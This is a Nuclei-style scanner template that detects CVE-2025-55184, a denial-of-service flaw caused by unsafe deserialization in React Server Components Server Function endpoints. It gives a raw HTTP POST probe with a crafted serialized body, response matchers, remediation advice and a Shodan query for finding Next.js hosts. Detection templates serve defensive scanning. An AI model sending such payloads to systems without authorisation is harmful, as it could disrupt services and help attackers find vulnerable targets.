id: CVE-2025-55184

info:
  name: React Server Components - Denial of Service
  author: DhiyaneshDk
  severity: high
  description: |
    React Server Components 19.0.0 to 19.2.1, including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack, contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
  impact: |
    Unauthenticated attackers can cause the server to hang indefinitely, resulting in denial of service and preventing legitimate requests.
  remediation: |
    Update to the latest version beyond 19.2.1.
  reference:
    - https://vercel.com/kb/bulletin/security-bulletin-cve-2025-55184-and-cve-2025-55183#patched-versions
    - https://www.facebook.com/security/advisories/cve-2025-55184
    - https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Next.js"
  tags: cve,cve2025,react,nextjs,react,vuln,vkev

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/x-component
        Content-Type: application/x-www-form-urlencoded
        Next-Action: x

        0=["$F1"]&1={"id":"x","bound":null}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'text/plain')"
          - "status_code == 404"
          - 'contains(body, "Server action not found")'
        condition: and
# digest: 490a0046304402202933432f99b98611bee0af2c903e419fcbda59fd89eb01d3073d7edcacfa220f02201203003d5be68038d4ca7863ab37fb61e31e7e7dd66c4402a90c98f99b015cda:922c64590222798bb761d5b6d8e72950